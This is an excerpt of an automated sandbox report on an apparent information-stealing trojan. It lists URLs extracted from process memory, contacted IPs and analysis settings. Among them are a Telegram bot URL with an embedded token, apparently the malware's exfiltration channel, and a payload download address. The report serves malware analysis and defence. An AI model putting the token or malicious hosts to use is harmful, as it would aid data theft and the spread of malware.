                                                                                                                        https://ads.stickyadstv.com/firefox-etpfirefox.exe, 0000002C.00000002.2608378311.00000144A9003000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          https://chrome.google.com/webstore~dwVrTdy.exe, 00000009.00000003.2033916766.000001B9CE439000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000009.00000003.2033727970.000001B9CE435000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            https://www.google.com/policies/privacy/mozIGeckoMediaPluginChromeServicefirefox.exe, 0000002C.00000002.2608378311.00000144A9003000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequenceFBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.00000000031C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                https://www.amazon.com/exec/obidos/external-search/firefox.exe, 0000002C.00000002.2608378311.00000144A9003000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002C.00000002.2642733104.00000144ACE00000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002C.00000002.2608378311.00000144A907C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  http://schemas.xmlsoap.org/ws/2004/10/wsat/faultFBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    http://schemas.xmlsoap.org/ws/2004/10/wsatFBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      https://github.com/mozilla-services/screenshotsfirefox.exe, 0000002C.00000003.2501375547.00000144ACC77000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002C.00000002.2642733104.00000144ACE00000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002C.00000002.2608378311.00000144A907C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKeyFBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          https://api.ip.sb/ipFBFF.tmp.fcxcx.exe, 00000026.00000000.2427424681.0000000000E52000.00000002.00000001.01000000.00000012.sdmp, FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/readerF0A3.tmp.ctx.exe, 00000027.00000002.2444899117.0000024335645000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 00000027.00000003.2438058600.0000024335600000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 00000027.00000002.2444169590.0000024335601000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 00000027.00000003.2437592905.0000024335642000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              http://compose.mail.yahoo.co.jp/ym/Compose?To=%sresource://gre/modules/DeferredTask.sys.mjsresource:firefox.exe, 0000002C.00000002.2608378311.00000144A907C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                https://chrome.google.com/webstoreKAzVRM7c.exe, 0000000B.00000003.2098977782.000002E27741B000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 0000000B.00000003.2097400296.000002E27741B000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 0000000B.00000003.2097224191.000002E277417000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  https://chrome.google.com/webstoreLt5abhIx.exe, 0000000D.00000003.2162878766.0000026D645A9000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000000D.00000003.2162231625.0000026D645A4000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000000D.00000003.2162651119.0000026D645A5000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000000D.00000003.2162176629.0000026D64591000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000000D.00000003.2162805710.0000026D645A5000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000000D.00000002.2203502992.0000026D645B1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                      http://win.mail.ru/cgi-bin/sentmsg?mailto=%sfirefox.exe, 0000002C.00000002.2602661602.00000144A8B7D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002C.00000002.2608378311.00000144A907C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                        http://schemas.datacontract.org/2004/07/System.ServiceModelFBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                          http://tempuri.org/Entity/Id24ResponseFBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.00000000031C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                            https://www.ecosia.org/newtab/FBFF.tmp.fcxcx.exe, 00000026.00000002.2687072362.00000000041FB000.00000004.00000800.00020000.00000000.sdmp, FBFF.tmp.fcxcx.exe, 00000026.00000002.2687072362.000000000452F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                              https://chrome.google.com/webstoreYAzVRM7c.exe, 0000000B.00000003.2098977782.000002E27741B000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 0000000B.00000003.2097400296.000002E27741B000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 0000000B.00000003.2097224191.000002E277417000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnegoFBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                  https://api.telegram.org/AccountdwVrTdy.exe, 0000000A.00000002.2183914279.000001CDE2B37000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                    http://schemas.xmlsoap.org/ws/2004/08/addressingFBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.00000000031C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                      https://ipinfo.io/dwVrTdy.exe, 00000009.00000002.2166451879.000001B9CE497000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000009.00000003.2145179779.000001B9CE4A9000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000009.00000002.2166863480.000001B9CFD10000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 0000000A.00000002.2184758872.000001CDE3440000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 0000000B.00000002.2223576684.000002E2774AD000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000000D.00000002.2203502992.0000026D645B1000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                                                                        https://static.adsafeprotected.com/firefox-etp-jsfirefox.exe, 0000002C.00000002.2682991190.00000144AED30000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002C.00000002.2681975606.00000144AEC10000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002C.00000002.2608378311.00000144A9003000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                          https://chrome.google.com/webstorejjKdwVrTdy.exe, 00000009.00000003.2034061867.000001B9CE447000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000009.00000003.2034164180.000001B9CE44A000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000009.00000003.2033786317.000001B9CE44E000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000009.00000003.2034384469.000001B9CE456000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000009.00000003.2033639099.000001B9CE443000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000009.00000003.2034237403.000001B9CE453000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                            http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponseFBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                              https://chrome.google.com/webstore0t5abhIx.exe, 0000000D.00000003.2162267263.0000026D6459A000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000000D.00000003.2162445204.0000026D6459A000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000000D.00000003.2162176629.0000026D64591000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000000D.00000003.2162651119.0000026D6459B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                https://sandbox.google.com/t5abhIx.exe, 0000000D.00000003.2162763970.0000026D645B6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                  http://tempuri.org/Entity/Id5ResponseFBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmp, FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.00000000031C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                    https://screenshots.firefox.com/googlefirefox.exe, 0000002C.00000002.2608378311.00000144A907C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                      http://tempuri.org/Entity/Id15ResponseDFBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003443000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                        https://chrome.google.com/webstore8dwVrTdy.exe, 0000000A.00000003.2051291870.000001CDE2B13000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 0000000A.00000003.2051163209.000001CDE2B10000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                          http://tempuri.org/Entity/Id10ResponseFBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.00000000031C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                            http://tempuri.org/Entity/Id8ResponseFBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.00000000031C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                              http://www.microsoft.cVNdwVrTdy.exe, 0000000A.00000002.2184758872.000001CDE3440000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                https://api.telegram.org/pdwVrTdy.exe, 00000009.00000002.2166863480.000001B9CFD10000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionIDFBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    https://api.telegram.org/mdwVrTdy.exe, 0000000A.00000002.2183914279.000001CDE2BB1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      http://schemas.xmlsoap.org/ws/2006/02/addressingidentityFBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        https://api.telegram.org/rdwVrTdy.exe, 00000009.00000002.2166863480.000001B9CFD10000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 0000000B.00000002.2223576684.000002E277408000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          http://schemas.microexplorer.exe, 00000014.00000000.2203972255.0000000002C00000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000014.00000000.2214469056.0000000007AF0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000014.00000000.2214505434.0000000007B10000.00000002.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                                                            https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/recordhigh.svgexplorer.exe, 00000014.00000000.2212795940.0000000006F94000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              http://tempuri.org/:hardwares.FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCTFBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                  https://api.telegram.org/bAzVRM7c.exe, 0000000B.00000002.2223576684.000002E277408000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                    https://login.microsoftonline.comfirefox.exe, 0000002C.00000002.2709016871.00000144AF89F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                      http://schemas.xmlsoap.org/ws/2004/04/security/trust/NonceFBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                        http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ1510FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                          https://api.telegram.org/dwVrTdy.exe, 00000009.00000002.2166863480.000001B9CFD10000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 0000000A.00000002.2183914279.000001CDE2BB1000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 0000000B.00000002.2223576684.000002E277408000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000000D.00000002.2203502992.0000026D645B1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                            http://tempuri.org/Entity/Id13ResponseFBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.00000000031C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                              http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdFBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                http://schemas.xmlsoap.org/ws/2005/02/trust/CK/PSHA1FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                  https://sandbox.google.com/payments/v4/js/integrator.jsUAzVRM7c.exe, 0000000B.00000003.2097348132.000002E277429000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 0000000B.00000003.2097183665.000002E277423000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                    http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#ThumbprintSHA1FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                      http://schemas.xmlsoap.org/ws/2005/05/identity/right/possesspropertyFBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.00000000031C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                        https://support.mozilla.org/kb/warning-unresponsive-script#w_other-causeshttps://support.mozilla.orgfirefox.exe, 0000002C.00000002.2681975606.00000144AEC1B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                          https://support.mozilla.org/kb/refresh-firefox-reset-add-ons-and-settings2firefox.exe, 0000002C.00000002.2770184103.00000144B0378000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                            https://mail.yahoo.co.jp/compose/?To=%sfirefox.exe, 0000002C.00000002.2608378311.00000144A907C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                              http://schemas.xmlsoap.org/ws/2005/02/rm/SequenceAcknowledgementFBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.00000000031C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                https://api.telegram.org/bot7855878545:AAEEMUvgpX9jTAxlDd2gM_Sbv2jbI6-5_0odwVrTdy.exe, 00000009.00000002.2166863480.000001B9CFD10000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                  https://ipinfo.io/jsonhEt5abhIx.exe, 0000000D.00000002.2203502992.0000026D645B1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                    https://www.msn.com/en-us/news/world/ukraine-live-briefing-biden-does-worry-house-drama-will-impact-explorer.exe, 00000014.00000000.2212795940.0000000006F94000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                      https://screenshots.firefox.com/firefox.exe, 0000002C.00000002.2608378311.00000144A907C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                        http://tempuri.org/Entity/Id4ResponseDFBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                          http://schemas.xmlsoap.org/2005/02/trust/tlsnego#TLS_WrapFBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                            http://tempuri.org/Entity/Id22ResponseDFBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.00000000032E3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                              http://tempuri.org/Entity/Id16ResponseDFBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.00000000033BC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/IssueFBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                  https://ipinfo.io/jsonFwAzVRM7c.exe, 0000000B.00000002.2223576684.000002E277408000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                    https://www.msn.com/en-us/news/opinion/decline-of-decorum-21-essential-manners-today-s-parents-fail-explorer.exe, 00000014.00000000.2212795940.0000000006F94000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                      http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextFBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                        http://schemas.xmlsoap.org/ws/2005/02/trust/IssueFBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                          http://tempuri.org/Entity/Id19ResponseDFBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003443000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                            http://schemas.xmlsoap.org/ws/2005/02/trust/spnegoFBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                              http://schemas.xmlsoap.org/ws/2005/02/scFBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                https://sandbox.google.com/payments/v4/js/integrator.js~t5abhIx.exe, 0000000D.00000003.2162267263.0000026D6459A000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000000D.00000003.2162403692.0000026D645A1000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000000D.00000003.2162176629.0000026D64591000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                  https://www.msn.com/en-us/news/crime/one-dead-several-wounded-after-drive-by-shootings-in-south-la/aexplorer.exe, 00000014.00000000.2212795940.0000000006F94000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                    http://80.82.65.70/files/downloadzVbe08f59021.exe, 00000016.00000003.2961780018.00000000055A1000.00000004.00000020.00020000.00000000.sdmp, be08f59021.exe, 00000016.00000003.2836146510.00000000055A1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                      • No. of IPs < 25%
                                                                                                                                                                                                                                                                                      • 25% < No. of IPs < 50%
                                                                                                                                                                                                                                                                                      • 50% < No. of IPs < 75%
                                                                                                                                                                                                                                                                                      • 75% < No. of IPs
                                                                                                                                                                                                                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                                                                                      185.215.113.43
                                                                                                                                                                                                                                                                                      unknownPortugal
                                                                                                                                                                                                                                                                                      206894WHOLESALECONNECTIONSNLtrue
                                                                                                                                                                                                                                                                                      185.81.68.147
                                                                                                                                                                                                                                                                                      unknownFinland
                                                                                                                                                                                                                                                                                      50108KLNOPT-ASFItrue
                                                                                                                                                                                                                                                                                      34.117.59.81
                                                                                                                                                                                                                                                                                      ipinfo.ioUnited States
                                                                                                                                                                                                                                                                                      139070GOOGLE-AS-APGoogleAsiaPacificPteLtdSGfalse
                                                                                                                                                                                                                                                                                      80.82.65.70
                                                                                                                                                                                                                                                                                      unknownNetherlands
                                                                                                                                                                                                                                                                                      202425INT-NETWORKSCfalse
                                                                                                                                                                                                                                                                                      185.215.113.16
                                                                                                                                                                                                                                                                                      unknownPortugal
                                                                                                                                                                                                                                                                                      206894WHOLESALECONNECTIONSNLfalse
                                                                                                                                                                                                                                                                                      216.58.208.238
                                                                                                                                                                                                                                                                                      drive.google.comUnited States
                                                                                                                                                                                                                                                                                      15169GOOGLEUSfalse
                                                                                                                                                                                                                                                                                      34.107.221.82
                                                                                                                                                                                                                                                                                      prod.detectportal.prod.cloudops.mozgcp.netUnited States
                                                                                                                                                                                                                                                                                      15169GOOGLEUSfalse
                                                                                                                                                                                                                                                                                      149.154.167.220
                                                                                                                                                                                                                                                                                      api.telegram.orgUnited Kingdom
                                                                                                                                                                                                                                                                                      62041TELEGRAMRUfalse
                                                                                                                                                                                                                                                                                      185.215.113.206
                                                                                                                                                                                                                                                                                      unknownPortugal
                                                                                                                                                                                                                                                                                      206894WHOLESALECONNECTIONSNLtrue
                                                                                                                                                                                                                                                                                      172.217.17.65
                                                                                                                                                                                                                                                                                      drive.usercontent.google.comUnited States
                                                                                                                                                                                                                                                                                      15169GOOGLEUSfalse
                                                                                                                                                                                                                                                                                      35.190.72.216
                                                                                                                                                                                                                                                                                      prod.classify-client.prod.webservices.mozgcp.netUnited States
                                                                                                                                                                                                                                                                                      15169GOOGLEUSfalse
                                                                                                                                                                                                                                                                                      142.250.181.78
                                                                                                                                                                                                                                                                                      youtube.comUnited States
                                                                                                                                                                                                                                                                                      15169GOOGLEUSfalse
                                                                                                                                                                                                                                                                                      31.41.244.11
                                                                                                                                                                                                                                                                                      unknownRussian Federation
                                                                                                                                                                                                                                                                                      61974AEROEXPRESS-ASRUfalse
                                                                                                                                                                                                                                                                                      IP
                                                                                                                                                                                                                                                                                      127.0.0.1
                                                                                                                                                                                                                                                                                      Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                                                                                                      Analysis ID:1573850
                                                                                                                                                                                                                                                                                      Start date and time:2024-12-12 16:46:07 +01:00
                                                                                                                                                                                                                                                                                      Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                                                                                      Overall analysis duration:0h 15m 23s
                                                                                                                                                                                                                                                                                      Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                                                                                      Report type:full
                                                                                                                                                                                                                                                                                      Cookbook file name:default.jbs
                                                                                                                                                                                                                                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                                                                                      Number of analysed new started processes analysed:46
                                                                                                                                                                                                                                                                                      Number of new started drivers analysed:0
                                                                                                                                                                                                                                                                                      Number of existing processes analysed:0
                                                                                                                                                                                                                                                                                      Number of existing drivers analysed:0
                                                                                                                                                                                                                                                                                      Number of injected processes analysed:1
                                                                                                                                                                                                                                                                                      Technologies:
                                                                                                                                                                                                                                                                                      • HCA enabled
                                                                                                                                                                                                                                                                                      • EGA enabled
                                                                                                                                                                                                                                                                                      • AMSI enabled
                                                                                                                                                                                                                                                                                      Analysis Mode:default
                                                                                                                                                                                                                                                                                      Analysis stop reason:Timeout
                                                                                                                                                                                                                                                                                      Sample name:file.exe
                                                                                                                                                                                                                                                                                      Detection:MAL
                                                                                                                                                                                                                                                                                      Classification:mal100.troj.spyw.evad.winEXE@113/133@73/14
                                                                                                                                                                                                                                                                                      EGA Information:
                                                                                                                                                                                                                                                                                      • Successful, ratio: 100%
                                                                                                                                                                                                                                                                                      HCA Information:
                                                                                                                                                                                                                                                                                      • Successful, ratio: 70%
                                                                                                                                                                                                                                                                                      • Number of executed functions: 151
                                                                                                                                                                                                                                                                                      • Number of non-executed functions: 95
                                                                                                                                                                                                                                                                                      Cookbook Comments:
                                                                                                                                                                                                                                                                                      • Found application associated with file extension: .exe
                                                                                                                                                                                                                                                                                      • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                                                                                                                                                                                                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, Conhost.exe, dllhost.exe, SIHClient.exe, conhost.exe
                                                                                                                                                                                                                                                                                      • Excluded IPs from analysis (whitelisted): 142.250.181.99, 142.250.181.142, 74.125.131.84, 13.107.42.16, 204.79.197.203, 13.107.21.239, 204.79.197.239, 13.107.6.158, 20.56.187.20, 2.16.158.97, 2.16.158.170, 2.16.158.81, 2.16.158.82, 2.16.158.83, 2.16.158.169, 2.16.158.96, 2.16.158.176, 2.16.158.88, 2.19.126.152, 2.19.126.145, 172.217.21.35, 173.194.222.84, 172.217.17.46, 88.221.134.209, 88.221.134.155, 142.250.181.67, 172.217.19.202, 172.217.17.74, 13.107.246.63, 52.149.20.212, 23.218.208.109, 40.126.53.11, 94.245.104.56, 20.42.73.29
                                                                                                                                                                                                                                                                                      • Excluded domains from analysis (whitelisted): nav-edge.smartscreen.microsoft.com, slscr.update.microsoft.com, a416.dscd.akamai.net, spocs.getpocket.com, clientservices.googleapis.com, aus5.mozilla.org, a19.dscg10.akamai.net, clients2.google.com, e86303.dscx.akamaiedge.net, ipv4only.arpa, login.live.com, config-edge-skype.l-0007.l-msedge.net, firefox.settings.services.mozilla.com, prod.ads.prod.webservices.mozgcp.net, l-0007.l-msedge.net, grahm.xyz, www.bing.com, prod.balrog.prod.cloudops.mozgcp.net, fs.microsoft.com, shavar.prod.mozaws.net, bingadsedgeextension-prod.trafficmanager.net, prod-atm-wds-edge.trafficmanager.net, www-www.bing.com.trafficmanager.net, business-bing-com.b-0005.b-msedge.net, shavar.services.mozilla.com, umwatson.events.data.microsoft.com, clients.l.google.com, location.services.mozilla.com, example.org, ciscobinary.openh264.org, config.edge.skype.com.trafficmanager.net, incoming.telemetry.mozilla.org, a17.rackcdn.com.mdc.edgesuite.net, contile.services.mozilla.com, prod.content-signatur
                                                                                                                                                                                                                                                                                      • HTTP sessions have been limited to 150. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                                                                                      • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                                                                                                                                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                                                                                                      • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                                                                                                                                      • Report size exceeded maximum capacity and may have missing network information.
                                                                                                                                                                                                                                                                                      • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                                                                                                                                                      • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                                                                                                                                                                                                                      • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                                                                                                                                                                                                      • Report size getting too big, too many NtOpenKey calls found.
                                                                                                                                                                                                                                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                                                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                                                                                                      • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                                                                                                                                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                                                                                      • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                                                                                                                                                                                      • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                                                                                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                                                                                      • VT rate limit hit for: file.exe
                                                                                                                                                                                                                                                                                      TimeTypeDescription
                                                                                                                                                                                                                                                                                      10:48:02API Interceptor604617x Sleep call for process: skotes.exe modified
                                                                                                                                                                                                                                                                                      10:48:31API Interceptor3939x Sleep call for process: msiexec.exe modified
                                                                                                                                                                                                                                                                                      10:48:31API Interceptor3892x Sleep call for process: audiodg.exe modified
                                                                                                                                                                                                                                                                                      10:48:47API Interceptor11655x Sleep call for process: explorer.exe modified
                                                                                                                                                                                                                                                                                      10:49:08API Interceptor76x Sleep call for process: FBFF.tmp.fcxcx.exe modified
                                                                                                                                                                                                                                                                                      10:49:09API Interceptor6x Sleep call for process: graph.exe modified
